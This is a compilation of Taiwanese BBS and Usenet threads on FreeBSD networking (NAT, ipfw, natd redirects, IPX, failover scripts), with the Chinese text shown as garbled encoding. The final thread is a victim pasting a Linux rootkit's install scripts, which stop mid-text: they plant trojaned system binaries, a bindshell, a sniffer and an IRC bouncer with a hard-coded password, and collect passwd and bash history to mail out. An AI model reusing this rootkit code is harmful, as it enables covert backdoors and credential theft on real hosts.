>     wins support = yes

>     wins proxy = yes  # making some old systems happy

> ¦bµøµ¡¤u§@¯¸¨ì±±¨î¥xªººô¸ô³]©w¸Ì±N 192.168.1.1¡£example¡¤

> ¥[¤J WINS ·j´M¦¸§Ç¤¤´N¥i¥H¤F¡C

> NetBIOS Áö¥i¥H³z¹L TCP/IP¡£NetBIOS over TCP/IP¡A²ºÙ NetBT ©Î NBT¡¤

> ¹L¤£¦Pªººô°ì¡A¦ý¥Ñ©ó NBT ¥Î broadcast ªº¤è¦¡¨Ó·j´M hosts¡A¦]¦¹¦b

> ¤j«¬ªººô¸ô¨Ã¤£¦X¾A¡A¦Ó¥Bµ´¤j³¡¥÷ªº¸ô¥Ñ¾¹³£·|±N NetBIOS ªº«Ê¥]¾×

> ±¼¨Ó´î§C¤£¥²­nªºÀW¼e®ö¶O¡C

:¯u¬O·PÁ§Aªº«ü¾É.....:)...

:¤j®¦¤£¨¥ÁÂ....¥i¥H¦b½Ð±Ð³Ì«á¤@­Ó°ÝÃD¶Ü?...

:¨º..IPXªº¨ó©w¬O§_¤]¦³¿ìªk³z¹LFreebsd¨Ó°e??



¦b kernel ¸Ì¥[¤J¡G



    options    IPX



¦b /etc/defaults/rc.conf ¸Ì±Ò°Ê¡G



    ifconfig_fxp0_ipx="ipx 0x101"

    ifconfig_fxp1_ipx="ipx 0x102"

    ipxgateway_enable="YES"

    ipxrouted_enable="YES"

    ipxrouted_flags=""



´N¥i¥H¤F¡C



­È±o¤@´£ªº¬O¡A¦b FreeBSD 3.x ®a±Ú¸Ì¡Aipxrouted ¥u¯à¤ä´© Ethernet_II

ªº frame type¡A¤£¹L FreeBSD-3.4 ¦³­Ó patch ¥i¥HÅý Ethernet_802.2¡B

Ethernet_802.3 ªº frame type ¦b ipxrouted ¤U°µÂà°e¡CFreeBSD-4.0 ¥H¤W

ª©¥»ªº ipxrouted ³£¦³¤ä´©³o¨Ç frame types¡C





--

¡° Origin: ¶³²H­·²M (bbs.au.edu.tw) 

¡» From: 211.75.7.180

¦b NAT + FIREWALL ¤U¦p¦ó°µ IP ¹ïÀ³

 

--------------------------------------------------------------------------------



¸Õ¬Ý¬Ý³o¼Ë°µ:



/etc/rc.conf

ifconfig _rl0="inet 140.113.10.x netmask 255.255.255.0"

ifconfig_rl0_alias0="inet 140.113.10.1 netmask 255.255.255.0"

ifconfig_rl0_alias1="inet 140.113.10.2 netmask 255.255.255.0"

ifconfig_rl1="inet 192.168.1.254 netmask 255.255.255.0"

firewall_enable="YES"

firewall_type="OPEN"  <-¦p kernel ¥H¦³ ipfirewall_default_to accept¥i§K

natd_enable="NO"



/etc/natd.conf

use_sockets

unregistered_only

redirect_address 192.168.1.1 140.113.10.1

redirect_address 192.168.1.2 140.113.10.2



/etc/rc.local

/sbin/route change -host 140.113.10.1 192.168.1.254

/sbin/route change -host 140.113.10.2 192.168.1.254

/sbin/ipfw add 1 divert natd ip from any to any via 140.113.10.x

/sbin/ipfw add 2 divert natd ip from any to any

/sbin/ipfw add 3 divert natd ip from any to any via 192.168.1.1

/sbin/ipfw add 4 divert natd ip from any to any via 192.168.1.2

/sbin/natd -a 140.113.10.x -f /etc/natd.conf



restart your host and enjoy !!



yyriver (lobin@mail2000.com.tw) wrote in message

news:8pdj12$2qrh$1@ftp.ntu.edu.tw...

> FREEBSD 4.1R ¤w¸g§¹¦¨ nat ©M firewall ªº³]©w

> ¦pªG·QÅý ¤À°t¯u¹ê ip ¹ïÀ³¨ìµêÀÀ ip¡A½Ð°Ý¸Ó¦p¦ó°µ

> ¦p

> 140.113.10.1  -->  192.168.1.1

> 140.113.10.2  -->  192.168.1.2

>

>

>

natd°ÝÃD...

 

--------------------------------------------------------------------------------



On Thu, Sep 28, 2000 at 06:29:48PM +0000, Over Time wrote:

> ¥u¯àtelnet¨ì192.168.1.254(§Ú³]ªºgateway)¦A³s¥X¥h...

> ¦ý¬O¤£¯à³s¨ì¥~­±ªº¾÷¾¹¤W...

> °õ¦æipfw -a showµ²ªG

> 65000  797 141116 divert 8668 ip from any to any via ed0

> 65100 2048 312263 allow ip from any to any

> 65535   11   1040 deny ip from any to any

> °õ¦ænetstat -nr

> Destination        Gateway            Flags     Refs     Use     Netif Expire

> default            210.244.71.254     UGSc        4        8      ed0

> 127.0.0.1          127.0.0.1          UH          0        2      lo0

> 192.168.1          link#1             UC          0        0      vr0

> 192.168.1.1        0:80:c8:c2:6b:ff   UHLW        3      692      vr0    787

> 210.244.70/23      link#2             UC          0        0      ed0

> 210.244.70.106     0:80:c8:10:ee:7f   UHLW        0      426      ed0     82

> 210.244.71.254     0:d0:58:26:a8:54   UHLW        5        0      ed0   1199

> 

> À°§Ú¬Ý¤@¤U°ÝÃD¥X¦b­þ§a...ÁÂÁÂ...

sysctl -a | grep net.inet.ip.forwarding 

¬O¥X²{ 1 or 0 ?



-- 

CirX - This site doesnt' exist.

9c  k9o h9 s1bg s1f, 7v  .y xqx a  sj m8r ffg1 vg5 a6 asox tmul h38 .

ant sj m8r ob ? 1fj mwby a1 tao vg5. soq df v ' .a. CirX.

¾×telnet??

 

--------------------------------------------------------------------------------



¡i ¦b lucy.bbs@bbs.csie.nctu.edu.tw (¤p¥Õè) ªº¤j§@¤¤´£¨ì: ¡j

: ¡° ¤Þ­z¡myuppie.bbs@bbs.ee.ncu.edu.tw (¤£³ßÅw¥¢±æ½}¤F)¡n¤§»Ê¨¥¡G

: >     man inetd¡A¨Ï¥Î -Ww option ´N¥i¥H°µ¨ì tcp_wrapper ªº¥\¯à¡C

: >     ´«¥y¸Ü»¡¡AFreeBSD 4.X ¤w¸g¤º«Ø tcp_wrapper ©ó inetd ¸ÌÀY¤F¡C

: >     °£«D§A¾÷¾¹ªº telnet ¤£Åý inetd ¨Ó³B²z¡A¤£µM¤@©w¥i¥H¥Î¡C

: >     ª½±µ¼g /etc/hosts.allow ´N¦n¤F¡Ainetd ­«¶]¤@¤U¸û«OÀI¡C

: >     Of course you can use ssh to modify /etc/hosts.allow

: >     if you have the root authority.

:     §Úªº/etc/hosts.allow(hosts.deny) §¹¥þ¨S¦³§ó°Ê

:     ¦ý¬O·í§Ú¦b/etc/rc.conf

:     §ó§ïinetd_flag="-l -R -w -W 1024"



        ±zªº°Ñ¼Æ¶¶§Ç¦³°ÝÃD°Ú...

        ¸Õ¸Õ¬Ý inetd_flag="-lwW -R 1024"

        

:     reboot«á,´N¤£¯à±q»·ºÝµn¤J£{

:     §Ú¶]¨ì¥D¾÷«e§â" -w -W "°Ñ¼Æ¥h±¼¤~¯à»·ºÝµn¤J...><

:     ¤£·|³]©w/etc/hosts.allow ><



      vi¡@hosts.allow¡@add

      sshd : ALL  : allow

      sshdfwd-X11 : ALL : allow

      

> ps -aux | grep "inetd"



root     118  0.0  0.3  1056  712  ??  Ss    1:00AM  0:00.01 inetd -lwW -R 1024



--

freebsd ¤WªºNATÂà´«¤@°Ý????

 

--------------------------------------------------------------------------------



¡i ¦b khchen1. ªº¤j§@¤¤´£¨ì: ¡j

: ½Ð°Ý¦U¦ì¤j­ô..

:          ¦bºô¸ô¤W¨ºùئ³Ãö©ó¬[natÂà´«ªº¬ÛÃö»¡©ú¤å¥ó§r...

:            ·Ð½Ð¦U¦ì§i¶D¤p§Ì..

:            ÁÂÁ¤j®a.





0.§Ú¦³¨â¥x¹q¸£,¤@­Óip,adsl

¤@¥x¹q¸£·ígateway ´¡¨â¶ôºô¸ô¥d(ed0 ed1)

¤@±i¹ï¥~(163.13.97.44) ¤@±i¹ï¤º(192.168.0.1)

¹ï¤ºªººô¸ô¥d¥ÎRJ45¹ï±µ



1./etc/rc.conf



saver="fire"

blanktime="300"

keyrate="fast"

network_interfaces="ed1 ed0 lo0"

ifconfig_ed0="inet 163.13.97.44  netmask 255.255.255.0"

ifconfig_ed1="inet 192.168.0.1 netmask 255.255.255.0"

defaultrouter="163.13.97.254"

hostname="ggg.test.tku.edu.tw"

gateway_enable="YES"

firewall_enable="YES"

natd_program="/sbin/natd"

natd_enable="YES"

natd_interface="ed0"





ps.·í¥u¦³¤@±iºô¸ô¥d®É

   ifconfig_ed0="inet 163.13.97.44 netmask 255.255.255.0"

   ifconfig_ed0_alias0="inet 192.168.0.1 netmask 255.255.255.0"

                ~~~~~

             ¤£¾å±o¦³¨S¦³spell¿ù~





2./etc/rc.firewall

/sbin/ipfw -f flush

/sbin/ipfw add divert natd all from any to any via ed0

/sbin/ipfw add pass all from any to any



3.­n½s½s®Ö¤ß°Õ

  ¥[¤Joptions IPFIREWALL

      options IPDIVERT

4.ºô¸ô¥d»Pºô¸ô¥d¤¬±µ°O±o¸õ½u³á





--



¡° ¨Ó·½:¡E´ç²îÀY¤§ÅÊ bbs.im.tku.edu.tw¡E[FROM: 211.21.92.23]

NAT¶i¶¥ªº¥\¯à¦p¦ó¹B¥Î???

 

--------------------------------------------------------------------------------



¡m ¦b seawolf.bbs@bbs.cs.nthu.edu.tw (®ü¯T) ªº¤j§@¤¤´£¨ì: ¡n

: ¡° ¤Þ­z¡mrepsol.bbs@bbs.cs.nccu.edu.tw (¤p®ü©ó§N»Å²§¹Ò¤¤)¡n¤§»Ê¨¥¡G

: > ¨Ï¥ÎNAT¥\¯à®É....¥i¥H¨Ï¥Î¤T±iºô¥d

: > ¤@±i¹ï¤º....Private IP...192.168.x.x

: > ¨â±i¹ï¥~....¹ï¥~ªº¨â±iºô¥d¬°¤£¦Pclassªº Public IP

: > ¹ï¥~°²³]¨ä¤¤¤@±iºô¥d¥N¸¹¬°vr0....¥t1¤@±i¬°vr1

: > ¥­±`¦b¹ï¥~ªº®É­Ô ....¥u¥Î¨ä¤¤¤@±i¹ï¥~ªººô¥d(vr0)

: > ¦pªGvr0±¾±¼....vr1¯à°÷¦Û°Ê±µ¤âNATªº¥\¯à

: > ¤]´N¬O»¡...clientºÝµL¶·°µ¥t¥~ªº§ó§ïgateway....

: > ´N¯à§ï¥Ñvr1¤Wºô

: > ³o¼Ëªº·Qªk¬O§_¥i¦æ....¦pªG¥i¦æ...¨º¤S¦p¦ó°µ³]©w

: > ·P¿E¤£ºÉ....thanks a lot

: §A¬O¤£¬O­n°µ³Æ´©ªº¥\¯à©O??

: ·í¥¿±`ªº±M½uÂ_¤F..°¨¤W§ï¨«¥t¤@±ø±M½u¤X??

: §Úªº·Qªk¬O¼g¤G­Óshell script

: ²Ä¤@­Ó¬O¥Îvr0¥hping vr1¤Wªºrouter

: ¤@¦ýµo²{¤£³qªº®É­Ô´N§ânatd interface§ï¦¨vr1

: ¨Ã¥B¶}©l¶]²Ä¤G­Óshell script ¥hping vr0ªºrouter

: ª½¨ì³qªº®É­Ô¦A§ânat interfaces§ï¦^¨Ó

: ¤£¹L§Ú¬O¦b¸ÕµÛ¥Î¼·±µ·í³Æ´©...¦ý¬O¨ì²{¦bÁÙ¨S¦¨¥\ ... >_<

  ³o¸Ì¦³¼g¦n´ú¹Lªºscript, §A¥i¥H¸Õ¸Õ¬Ý...



#!/bin/sh

gatewayP="163.13.1.254"

gatewayS="211.72.177.254"

# P = Primary , S = Secondary

active="P"

while [ 1 ]; do

  response="`/sbin/ping -c 1 $gatewayP | grep from`"

#  echo $active : $response

  if [ "$response" ]; then

    if [ "$active" = "S" ]; then

      route delete -net 0.0.0.0

      route add -net 0.0.0.0 -gateway $gatewayP

      active="P"

    fi

  else

    if [ "$active" = "P" ]; then

      route delete -net 0.0.0.0

      route add -net 0.0.0.0 -gateway $gatewayS

      active="S"

    fi

  fi

  sleep 1

done



--

³o­Ó¬O³Æ´©ªºÆ[©À....§Úªº·Qªk¬O±N¤@¨Çservices portÂà¨ì¥t¤@±ø±M½u(ex:80 port)

¤]´N¬O±NclientºÝ(µêÀÀipºÝªº­n¨D)§â¥LÂಾ¨ì¥t¤@±ø±M½u¥X¥h(¨â±ø±M½u¬°¤£¦Pºô¬q)

¨â±ø¤£¦Pºô¬qªº±M½u¦b¦P¤@¥x¾÷¾¹¤W...§@natdªº¥\¯à...¤ÀÅu±¼¤@¨Çservices port traffic¬y¶q...

¤£­nÅýtraffic¥þ³¡À½¶i¤@±ø±M½u

¥i¬O........³o¼Ëªº³]©w....§Ú¤£·|  .....   :(

§Æ±æ¦U¦ì¤j¤jÀ°À° ¦£....ÁÂÁÂ



¡° ¨Ó·½:¡E³J±²¼s³õ bbs.tku.edu.tw¡E[FROM: 163.13.91.163]

½Ð°Ý NAT ªº redirect °ÝÃD...

 

--------------------------------------------------------------------------------



¡° ¤Þ­z¡mSouthWind.bbs@bbs.cs.nthu.edu.tw (µ¦²¤..)¡n¤§»Ê¨¥¡G

: ¡° ¤Þ­z¡mjialin@bbs.ee.ntu.edu.tw (Åï¨à)¡n¤§»Ê¨¥¡G

: >   1)¦bµ¹¤@­Óip·í¤º³¡ipÂà«á«áªº¦ì¸m...

: >   2)¥Î¤£¦Pport¨ÓÂà..¦p8080<->80 ­ì¦³80ÁÙ¥i¥Î...

: ------------------------------------------------------>>>

: µL²zªº½Ð¨D,¥i§_Á|°Ñ¼Æªº¹ê»Ú¨Ò¤l...

: §Ú²Õ¦X¹L´XºØ°Ñ¼Æ,¦ü¥G¤]¨S¦³¹F¨ì¹w´Á®ÄªG...

: ¥t,À³¸Ó¸ò§Úªº public IP ¬O DHCP ªº dynamic IP ¨S¦³Ãö«Y§a???

: §Ú¦³¥¿½T¹ïÀ³ªº DN <-> IP ...

  /etc/rc.conf

  natd_flags="-f /etc/natd.conf"

  /etc/natd.conf

  redirect_port tcp server_ip:8080 local_server_ip:80

or(©T©wip,¥tµ¹¤@­Ó¥i¥Îip)

  /etc/rc.conf

  ifconfig_vr0_alias0="inet 192.168.0.161 netmask 255.255.255.0"

  .

  .

  .

  nat_flags="-f /etc/natd.conf"

  /etc/natd.conf

  redirect_port tcp 192.168.0.161:80 local_server_ip:80

  redirect_port tcp 192.168.0.161:25 local_smtp_ip:25

  redirect_port tcp 192.168.0.161:110 local_pop3_ip:110

¥u¦C¥Xnatd³¡¤À...¨ä¥LÀ³¸Ó¥i¥H§a...

¸Õ¸Õ¤£¦æ¦Amail...

--

¡° Origin: »O¤j¹q¾÷ Maxwell ¯¸ ¡» From: 139.223.87.135

natdªº°g«ä...½Ð«e½ú¸Ñ´b!!!

 

--------------------------------------------------------------------------------



"®ü¯T" (seawolf.bbs@bbs.cs.nthu.edu.tw) ¼¶¼g©ó¶l¥ó

news:3dK9Te$tGs@bbs.cs.nthu.edu.tw...

> ¡° ¤Þ­z¡mclive@CirX.ORG (Clive Lin)¡n¤§»Ê¨¥¡G

> §Ú´«­Ó¤è¦V°Ý,¦bICQ©Î¬OIRC client¥[¤Wsokcet 4,³o¨Ç«D©T©wportªº¶Ç¿é

> ´N¥¿±`¤F,¨º»òsocket 4 SERVER ­n«ç»ò¬[©O??



http://beta.wsl.sinica.edu.tw/~ylchang/Security/Firewall/Socks5.html



¥H«e¼gªºªF¦è(socks5 v1.0r10), ­×Ãã¨S¦³«Ü¦n, ¥[´î¬Ý¦n¤F :p



²{¦b nec-socks5 ¦³·sª© (v1.0r11) ªº, source »P patch ¤]©ñ¦b

ftp://ftp.se.ntou.edu.tw/pub/UNIX/SOCKS5/ ¤U­±.



------

test nat fail

 

--------------------------------------------------------------------------------



==> jamesHammer.bbs@bbs.cs.nthu.edu.tw (HUMAN.CPP DIE!!!!) ªº¤å³¹¤¤´£¨ì:



fxp0 :¹ï¥~(Public)

fxp1 :¹ï¤º



rc.firewall¼g³o¥|¦æ´N¦n¤F,¨ä¾l¥þ³¡§R±¼(ª`·Nipfwªº¦ì¸m)

/sbin/ipfw -f flush

/sbin/ipfw add divert natd all from any to any via fxp0

/sbin/ipfw add pass all from any to any

/sbin/ipfw add 65534 allow all from any to any



±q§Aªºrc.conf±oª¾³o¤@¦æ¶}¾÷®É´N¶]¤F

>$natd -interface fxp0



natd.conf ¥u¼g¤U­±¤@¦æ(¦pªG¤£»Ýport redirect)

dynamic



§ï¦n¤£¥Îreboot

°õ¦ænatd -interface fxp0 ´N¥i¥H¸Õ¤F



>i has test my card .run fxp1 ping fxp0 can't ping .how can i do ??

>help!!!!

--

* Origin: ¤¤¤s¤j¾Ç-¬üÄR¤§®qBBS * From: 211.20.155.138 [¤w³q¹L»{ÃÒ]



--------------------------------------------------------------------------



¡° ¤Þ­z¡mchuwei.bbs@bbs.nsysu.edu.tw (¥D©e)¡n¤§»Ê¨¥¡G

: ==> jamesHammer.bbs@bbs.cs.nthu.edu.tw (HUMAN.CPP DIE!!!!) ªº¤å³¹¤¤´£¨ì:

: fxp0 :¹ï¥~(Public)

: fxp1 :¹ï¤º

: rc.firewall¼g³o¥|¦æ´N¦n¤F,¨ä¾l¥þ³¡§R±¼(ª`·Nipfwªº¦ì¸m)

: /sbin/ipfw -f flush

: /sbin/ipfw add divert natd all from any to any via fxp0

: /sbin/ipfw add pass all from any to any

: /sbin/ipfw add 65534 allow all from any to any

: ±q§Aªºrc.conf±oª¾³o¤@¦æ¶}¾÷®É´N¶]¤F

: >$natd -interface fxp0

: natd.conf ¥u¼g¤U­±¤@¦æ(¦pªG¤£»Ýport redirect)

: dynamic

: §ï¦n¤£¥Îreboot

: °õ¦ænatd -interface fxp0 ´N¥i¥H¸Õ¤F

: >i has test my card .run fxp1 ping fxp0 can't ping .how can i do ??

: >help!!!!

  rc.firewall ¬O¤£»Ý­n¥h°Êªº...

  /etc/rc.conf

  natd_interface=fxp0

  natd_enable=YES

  firewall_enable=yes

  firewall_type=open

  gateway_enable=yes

  À³¸Ó´N¦n¤F§a...

--

¡° Origin: »O¤j¹q¾÷ Maxwell ¯¸ ¡» From: 139.223.87.135

¶â¡A¨t²Î¦n¹³³Q crack ¤F...

 

--------------------------------------------------------------------------------



        «e´X¤Ñ¬ðµMµo²{¦b / ¦³­Ó la.tgz ªºÀÉ®×..

-r--------   1 root     root       384575 Aug 15 16:33 la.tgz

        ¦ý¬O¤@¤U¤l¤]¨S¥h³B²z¡A

        ¤µ¤Ñ±N¥L¸Ñ¶}¨Ó¬Ý...

        µo²{¥H¤UªºªF¦è..

        ¥Ñ©ó¹ï¾ã­Ó linux ¨t²ÎÁÙ¤£¬O«Ü¼ô¡A

        ¥u¬Oµo²{¥L¦n¹³§â§Úªº syslogd §ï¤F...

        ±q³o­ÓÀÉ®×¥X²{ªº¤é´Á¤§«áªº©Ò¦³ /var/log/secure.* ªº log ´N

        ¥þ³¡¨S¦³¤º®e¤F¡A

        ¤§«eªº³£ÁÙ¤@¤Á¥¿±`....:(

        ¥H¤U¬O¦b¸ÓÀ£ÁYÀɤºªº¤@¨Ç shell Àɪº¤º®e¡A

        ¦³¤H¥i¥H§i¶D§Ú¨ì©³µo¥Í¤FÔ£¨Æ¹À¡H



-rw-r--r--   1 root     root       321888 Aug 14 06:41 bds.tgz

drwxr-xr-x   2 root     root         4096 Aug 13 13:40 bindshell

-rw-r--r--   1 root     root          393 Aug 13 18:07 bnc.sh

-rwxr-xr-x   1 root     root        21156 Jul 30 17:38 in.identd

-rw-r--r--   1 root     root         4100 Aug 15 15:57 install.sh

-r-s--x--x   1 root     root        71335 Aug 13 14:12 login

drwxr-xr-x   2 root     root         4096 Jul 31 02:40 pty

-rw-r--r--   1 root     root         5374 Aug 14 12:30 secure.sh



bindshell ¥Ø¿ý¡G

================

-rw-r--r--   1 501      staff         359 Aug 14 11:33 bindshell.sh

-rwxr-xr-x   1 root     root        12105 Jul 28 13:48 inetd

-rwxr-xr-x   1 root     root        16015 Jul 28 13:52 rsz



¥t¥~ pty ¥Ø¿ý¬OªÅªº....



¥H¤U¬O install.sh ªº³¡¥÷

========================

#!/bin/sh

unset HISTFILE

killall -9 -q syslogd

clear

echo "#######################################################################"

echo "#######################################################################"

echo "#### distribute and i will kill you.                               ####"

echo "#### note: it will fuck up linux 2.0.*                             ####"

echo "#######################################################################"

echo "#######################################################################"

oldloc=`pwd`

if [ "$UID" != 0 ] ; then

echo "#### you st00pid monkeyass, you gotta be root to run this!         ####"

echo "#######################################################################"

exit 0

fi

if [ -d /dev/ttyyy ] ; then

echo "### aborting...                                                   ####"

echo "#######################################################################"

exit 0

fi

killall -9 -q bnc

killall -9 -q minegtty

killall -9 -q sniff

rm -rf /dev/ttyyy

mkdir /dev/ttyyy

echo "#### backdooring stuff..                                           ####"

touch -r /bin/login login

chattr -isa /bin/login

rm -f /bin/login

mv login /bin/login

chmod 000 /bin/login

chmod a+x /bin/login

chmod u+sr /bin/login

tar zxf bds.tgz

rm -rf bds.tgz

cd bds

touch -acmr /bin/ps ps

touch -acmr /bin/ls ls

touch -acmr /bin/netstat netstat

touch -acmr /usr/bin/find find

touch -acmr /usr/bin/top top

touch -acmr /usr/bin/pstree pstree

touch -acmr /usr/bin/find find

if [ -f /usr/bin/show ] ; then

touch -acmr /usr/bin/show show

chattr -isa /usr/bin/show

mv -f show /usr/bin/show

chmod +x /usr/bin/show

fi

if [ -f /usr/sbin/syslogd ] ; then

touch -acmr /usr/sbin/syslogd syslogd

chattr -isa /usr/sbin/syslogd

mv -f syslogd /usr/sbin/syslogd

chmod +x /usr/sbin/syslogd

else

touch -acmr /sbin/syslogd syslogd

chattr -isa /sbin/syslogd

mv -f syslogd /sbin/syslogd

chmod +x /sbin/syslogd

fi

touch -acmr /usr/sbin/tcpd tcpd

touch -acmr /sbin/ifconfig ifconfig

chattr -isa /bin/ps

mv -f ps /bin/ps

chattr -isa /bin/netstat

mv -f netstat /bin/netstat

chattr -isa /usr/bin/top

mv -f top /usr/bin/top

chattr -isa /bin/ls

mv -f ls /bin/ls

chattr -isa /usr/bin/find

mv -f find /usr/bin/find

chattr -isa /usr/bin/pstree

mv -f pstree /usr/bin/pstree

chattr -isa /usr/sbin/tcpd

mv -f tcpd /usr/sbin/tcpd

chattr -isa /sbin/ifconfig

mv -f ifconfig /sbin/ifconfig

cd ..

rm -rf bds

chmod +x /bin/ps

chmod +x /bin/netstat

chmod +x /usr/bin/top

chmod +x /bin/ls

chmod +x /usr/bin/find

chmod +x /usr/bin/pstree

chmod +x /usr/sbin/tcpd

chmod +x /sbin/ifconfig

echo "#### done backdooring.                                             ####"

echo "#### setting up a bindshell..                                      ####"

cd bindshell

sh bindshell.sh

cd ..

echo "#### done setting up bindshell, now setting up a sniffer..         ####"

mv sniff /dev/ttyyy/sniff

chmod +x /dev/ttyyy/sniff

cd /dev/ttyyy

./sniff &

cd $oldloc

mv -f pty/* /dev/

echo "#### enabling telnet/disabling auth...                             ####"

sed "s/^#telnet/telnet/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr /etc/in

etd.conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

sed "s/^# telnet/telnet/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr /etc/i

netd.conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

sed "s/^auth/#auth/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr /etc/inetd.

conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

sed "s/^ auth/# auth/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr /etc/inet

d.conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

etd.conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

sed "s/^# telnet/telnet/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr /etc/i

netd.conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

sed "s/^auth/#auth/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr /etc/inetd.

conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

sed "s/^ auth/# auth/" /etc/inetd.conf > /tmp/.pinespool ; touch -acmr /etc/inet

d.conf /tmp/.pinespool; mv -f /tmp/.pinespool /etc/inetd.conf

killall -9 -q in.identd

killall -9 -q identd

mv -f in.identd /usr/sbin/in.identd

chmod 000 /usr/sbin/in.identd

chmod +x /usr/sbin/in.identd

killall -HUP inetd

/usr/sbin/in.identd -s

cat /etc/rc.d/rc.local > /tmp/rc.local; echo "/usr/sbin/in.identd -s" >> /tmp/rc

.local ; touch -acmr /etc/rc.d/rc.local /tmp/rc.local; mv -f /tmp/rc.local /etc/

rc.d/rc.local

mkdir /dev/...

echo "root:m00" > /dev/.../id

sh bnc.sh

echo "#### securing now...                                               ####"

sh secure.sh



©³¤U¬O bnc.sh ªº³¡¥÷

=====================

mkdir -p /dev/ttyyy/bnc

mv -f bnc /dev/ttyyy/bnc/bnc

bncport=27686

bncpass=s3ct0r

bncusers=0

bncdefport=6667

echo "pt:$bncport" > /dev/ttyyy/bnc/bnc.conf

echo "ps:$bncpass" >> /dev/ttyyy/bnc/bnc.conf

echo "mu:$bncusers" >> /dev/ttyyy/bnc/bnc.conf

echo "dp:$bncdefport" >> /dev/ttyyy/bnc/bnc.conf

chmod 700 /dev/ttyyy/bnc/bnc

cd /dev/ttyyy/bnc

./bnc bnc.conf 1>/dev/null 2>/dev/null

cd $oldloc



±µ¤U¨Ó¬O secure.sh ªº³¡¥÷

==========================

#!/bin/sh

oldloc=`pwd`

cd /etc

cp inetd.conf /dev/ttyyy/inetd.conf

grep -v pop-2 inetd.conf > stop.pop

touch -r inetd.conf stop.pop

mv -f stop.pop inetd.conf

echo "#### removing the users you added..                                ####"

grep -v sectr passwd > passwd.out

touch -r passwd passwd.out

mv -f passwd.out passwd

grep -v sector passwd > passwd.out

touch -r passwd passwd.out

mv -f passwd.out passwd

if [ -f /etc/shadow ] ; then

 grep -v sectr shadow > shadow.out

 touch -r shadow shadow.out

 mv -f shadow.out shadow

 grep -v sector shadow > shadow.out

 touch -r shadow shadow.out

 mv -f shadow.out shadow

fi

cd $oldloc

echo "#### patching the box from local vulnerabilities...                ####"

if [ -f /usr/sbin/userhelper ] ; then

 chmod u-s /usr/sbin/userhelper

fi

if [ -f /usr/bin/man ] ; then

 chmod 700 /usr/bin/man

fi

if [ -f /usr/bin/suidperl ] ; then

 chmod u-s /usr/bin/suidperl

fi

if [ -f /var/spool/lpd/lp/.config ] ; then

 chmod 700 /var/spool/lpd/lp/.config

fi

if [ -f /etc/ld.so.preload ] ; then

 chmod 700 /etc/ld.so.preload

fi

if [ -f /usr/X11R6/bin/xterm ] ; then

 chmod 700 /usr/X11R6/bin/xterm

fi

if [ -f /usr/bin/inews ] ; then

 chmod 700 /usr/bin/inews

fi

if [ -f /usr/bin/crontab ] ; then

 chmod 700 /usr/bin/crontab

fi

if [ -f /usr/local/bin/acushop/.sbstart ] ; then

 chmod 700 /usr/local/bin/acushop/.sbstart

fi

if [ -f /sbin/smbmount ] ; then

 chmod 700 /sbin/smbmount

fi

if [ -f /usr/libexec/pt_chown ] ; then

 chmod 700 /usr/libexec/pt_chown

fi

if [ -f /usr/bin/xvcad/dxfin ] ; then

 chmod 700 /usr/bin/xvcad/dxfin

fi

if [ -f /usr/sbin/amq ] ; then

 chmod 700 /usr/sbin/amq

fi

if [ -f /usr/bin/zgv ] ; then

 chmod 700 /usr/bin/zgv

if [ -f /etc/ftpaccess ] ; then

 echo "#### disabling anonymous ftp..                                     ####"

 grep -v anonymous /etc/ftpaccess > /tmp/ftpaccess

 echo "class   all   real,guest *" >> /tmp/ftpaccess

 touch -acmr /etc/ftpaccess /tmp/ftpaccess

 rm -rf /etc/ftpaccess

 mv -f /tmp/ftpaccess /etc/ftpaccess

fi



grep -v ingreslock /etc/services > /tmp/services

touch -acmr /etc/services /tmp/services

mv -f /tmp/services /etc/services

grep -v sunrpc /etc/services > /tmp/services

touch -acmr /etc/services /tmp/services

mv -f /tmp/services /etc/services



rm -rf /var/named/ADMROCKS

killall -9 rpc.mountd rpc.portmap rpc.nfsd smbd portmap 1>/dev/null 2>/dev/null

killall -9 nmbd snmpd ypasswd rpc.yppasswdd 1>/dev/null 2>/dev/null

killall -9 rpc.yppasswdd rpc.statd 1>/dev/null 2>/dev/null

ps -aux | grep amd | grep -v grep | awk '{print "kill -9 "$2""}' > kill

ps -aux | grep ipop | grep -v grep | awk '{print "kill -9 "$2""}' >> kill

ps -aux | grep auto | grep -v grep | awk '{print "kill -9 "$2""}' >> kill

ps -aux | grep named | grep -v grep | awk '{print "kill -9 "$2""}' >> kill

chmod 700 kill

./kill

rm -rf kill

grep -v 9704 /etc/inetd.conf > /tmp/inetd ; touch -acmr /etc/inetd.conf /tmp/ine

td ; mv -f /tmp/inetd /etc/inetd.conf

echo "#### mailing the box info to you...                                ####"

echo "" > owned

echo "* CPU Info:" >> owned

echo "" >> owned

cat /proc/cpuinfo >> owned

echo "" >> owned

echo "" >> owned

echo "* SYS Info:" >> owned

echo "" >> owned

uname -a >> owned

uptime >> owned

echo "" >> owned

echo "" >> owned

echo "* MEM Info:" >> owned

echo "" >> owned

cat /proc/meminfo >> owned

echo "" >> owned

echo "" >> owned

echo "* NET Info:" >> owned

echo "" >> owned

/sbin/ifconfig >> owned

echo "" >> owned

echo "" >> owned

echo "* HOST Info:" >> owned

echo "" >> owned

hostname >> owned

echo "" >> owned

echo "" >> owned

if [ -f /root/.bash_history ] ; then

 echo "* HISTORY File (/root):" >> owned

 echo "" >> owned

 cat /root/.bash_history >> owned

 echo "" >> owned

 echo "" >> owned

fi

if [ -f /.bash_history ] ; then

 echo "* HISTORY File (/):" >> owned

echo "" >> owned

 cat /.bash_history >> owned

 echo "" >> owned

 echo "" >> owned

fi

if [ -f /tmp/.bash_history ] ; then

 echo "* HISTORY File (/tmp):" >> owned

echo "" >> owned

 cat /tmp/.bash_history >> owned

 echo "" >> owned

 echo "" >> owned

fi

echo "* INETD Config:" >> owned

echo "" >> owned

cat /etc/inetd.conf >> owned

echo "" >> owned

echo "" >> owned

echo "* PASSWD File:" >> owned

